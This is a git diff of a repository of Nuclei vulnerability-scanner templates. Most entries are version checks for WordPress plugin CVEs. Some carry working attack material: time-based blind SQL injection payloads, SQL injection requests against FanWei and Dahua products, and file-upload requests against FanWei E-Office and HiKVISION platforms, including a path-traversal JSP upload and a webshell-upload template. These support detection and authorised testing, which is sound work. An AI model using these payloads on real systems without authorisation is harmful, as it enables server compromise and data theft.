+1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: KhukuriRimal - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - - "XOR(if(now()=sysdate(),sleep(7),0))XOR" - - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "duration>=7 && duration <=16" - condition: and \ No newline at end of file +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: Coffinxp/lostsec + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'%2b(select*from(select(sleep(7)))a)%2b'" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" + - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "duration>=7 && duration <=16" diff --git a/poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml b/poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml new file mode 100644 index 0000000000..edcefcecb4 --- /dev/null +++ b/poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7032-cabe7edb9453e46b358c075428df2586 + +info: + name: > + Smart Online Order for Clover <= 1.5.6 - Missing Authorization to Plugin Deactivation and Data Deletion + author: topscoder + severity: high + description: > + The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'moo_deactivateAndClean' function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to deactivate the plugin and drop all plugin tables from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6b05b1-c649-4b72-b884-11fb83ec77f2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2024-7032 + metadata: + fofa-query: "wp-content/plugins/clover-online-orders/" + google-query: inurl:"/wp-content/plugins/clover-online-orders/" + shodan-query: 'vuln:CVE-2024-7032' + tags: cve,wordpress,wp-plugin,clover-online-orders,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "clover-online-orders" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.6') \ No newline at end of file diff --git a/poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml b/poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml new file mode 100644 index 0000000000..1d4ab91acf --- /dev/null +++ b/poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf + +info: + name: > + MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar <= 5.7.0.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Deletion + author: topscoder + severity: low + description: > + The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43adc9dd-1780-440f-90c2-ff05a22eb084?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-7856 + metadata: + fofa-query: "wp-content/plugins/mp3-music-player-by-sonaar/" + google-query: inurl:"/wp-content/plugins/mp3-music-player-by-sonaar/" + shodan-query: 'vuln:CVE-2024-7856' + tags: cve,wordpress,wp-plugin,mp3-music-player-by-sonaar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mp3-music-player-by-sonaar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mp3-music-player-by-sonaar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.7.0.1') \ No newline at end of file diff --git a/poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml b/poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml new file mode 100644 index 0000000000..6acd3dbd1f --- /dev/null +++ b/poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Special Feed Items plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8051 + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:CVE-2024-8051' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..aa02a4941d 100644 --- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml b/poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml new file mode 100644 index 0000000000..18f0996b45 --- /dev/null +++ b/poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml @@ -0,0 +1,59 @@ +id: front-end-only-users-947badb91b071755d9969be9242e4456 + +info: + name: > + Front End Users <= 3.2.28 - Authenticated (Contributor+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/front-end-only-users/" + google-query: inurl:"/wp-content/plugins/front-end-only-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,front-end-only-users,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/front-end-only-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "front-end-only-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.28') \ No newline at end of file diff --git a/poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml b/poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml new file mode 100644 index 0000000000..b626c51e7f --- /dev/null +++ b/poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml @@ -0,0 +1,59 @@ +id: popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7 + +info: + name: > + Popup Builder <= 4.3.3 - Sensitive Information Exposure via Imported Subscribers CSV File + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/086cd6a0-adb6-4e12-b34c-630297f036f3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/popup-builder/" + google-query: inurl:"/wp-content/plugins/popup-builder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,popup-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.3') \ No newline at end of file diff --git a/poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml b/poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml new file mode 100644 index 0000000000..d1a67b3855 --- /dev/null +++ b/poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml @@ -0,0 +1,59 @@ +id: special-feed-items-27adb5630206288cc4533169053590e1 + +info: + name: > + Special Feed Items <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a54d1d-3593-4ba1-a747-651278488be6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/special-feed-items/" + google-query: inurl:"/wp-content/plugins/special-feed-items/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,special-feed-items,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/special-feed-items/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "special-feed-items" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml b/poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml new file mode 100644 index 0000000000..237e254681 --- /dev/null +++ b/poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml @@ -0,0 +1,59 @@ +id: theme-editor-28b564b15db8ff756b87ff0ae5c6d260 + +info: + name: > + Theme Editor <= 2.8 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/theme-editor/" + google-query: inurl:"/wp-content/plugins/theme-editor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,theme-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/theme-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "theme-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8') \ No newline at end of file diff --git a/poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml b/poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml new file mode 100644 index 0000000000..5c4318cc5c --- /dev/null +++ b/poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml @@ -0,0 +1,59 @@ +id: ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5 + +info: + name: > + TI WooCommerce Wishlist <= 2.8.2 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8456fa-939c-4ceb-8361-a8758aec7708?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/" + google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ti-woocommerce-wishlist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.2') \ No newline at end of file diff --git a/poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml b/poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml new file mode 100644 index 0000000000..ee6a3dbc6d --- /dev/null +++ b/poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml @@ -0,0 +1,59 @@ +id: zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb + +info: + name: > + Zephyr Project Manager <= 3.3.102 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/33bf39f8-6f56-4089-bb46-5d401af72953?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.102') \ No newline at end of file diff --git a/poc/sql_injection/BlindSQLAuth.yaml b/poc/sql_injection/BlindSQLAuth.yaml index ce5d86554b..6fd8c3c79a 100644 --- a/poc/sql_injection/BlindSQLAuth.yaml +++ b/poc/sql_injection/BlindSQLAuth.yaml @@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: KhukuriRimal - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - - "XOR(if(now()=sysdate(),sleep(7),0))XOR" - - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "status_code == 200" - - "duration>=7 && duration <=16" - condition: and \ No newline at end of file +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: Coffinxp/lostsec + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'%2b(select*from(select(sleep(7)))a)%2b'" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" + - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "duration>=7 && duration <=16" diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 4e7ede529c..aa02a4941d 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 1af31ba824..78d89c1465 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml @@ -1,43 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" -http: - - raw: - - | - POST /publishing/publishing/material/file/video HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 804 - Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 - Accept-Encoding: gzip, deflate - Connection: close - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" - Test - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Submit" +http: + - method: GET + path: + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" - submit - --dd8f988919484abab3816881c55272a7-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "success")' - - 'contains(body_1, "path")' - condition: and + - type: word + part: body + words: + - "c4ca" -# /publishingImg/VIDEO/230812152005170200.jsp + - type: status + status: + - 500 diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml @@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 